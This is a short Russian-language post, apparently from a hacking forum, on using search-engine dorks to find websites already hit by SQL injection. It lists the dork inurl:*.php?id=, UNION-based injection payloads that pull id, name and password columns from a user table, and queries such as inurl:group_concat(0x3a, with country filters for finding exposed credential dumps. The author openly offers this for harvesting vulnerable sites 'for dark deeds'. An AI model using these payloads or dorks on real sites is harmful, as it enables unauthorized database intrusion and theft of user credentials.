
Всем известно, что поисковые машины индексируют любую информацию, которая не закрыта в robots.txt. Этим давно начали пользоваться взломщики для поиска уязвимых систем. Многие используют так называемые дорки для нахождения определенных дыр.
После недавних событий с индексацией гуглом и яндексом пользовательских данных абонентов мтс и мегафон мне в голову пришла идея, а не попробывать ли искать с помощью дорка уже "сломанные" сайты. Мне это нужно было для своих целей, о которых я сейчас говорить не буду =).
Для поиска потенциально уязвимых сайтов(для sql иньекций) в основном используется дорк вида:
Код:
inurl:*.php?id=
Код:
http://site.ru/*.php?id=-1+1,2,concat_ws(0x3a,id,name,pass),4+from+user
Код:
http://site.ru/*.php?id=-1+1,2,group_concat(0x3a,id,name,pass),4+from+user
Код:
concat_ws(0x3a,
Код:
group_concat(0x3a
Код:
inurl:concat_ws(0x3a,
Код:
inurl:group_concat(0x3a,
Код:
site:.us inurl:concat_ws(0x3a,
Код:
site:.de inurl:group_concat(0x3a,
Пример запроса
Код:
site:.de inurl:group_concat(0x3a,

Также в запрос можно добавить наименования столбцов, интересующих нас(кто в теме, меня понял =) ) :
Код:
inurl:concat_ws(0x3a,_login,_pass
Плюс, если воспользоваться парсером гугла, можно собрать готовую базу уязвимых сайтов для своих темных дел =)
Специально для webcriminal.ru (с) 2FED
Последнее редактирование: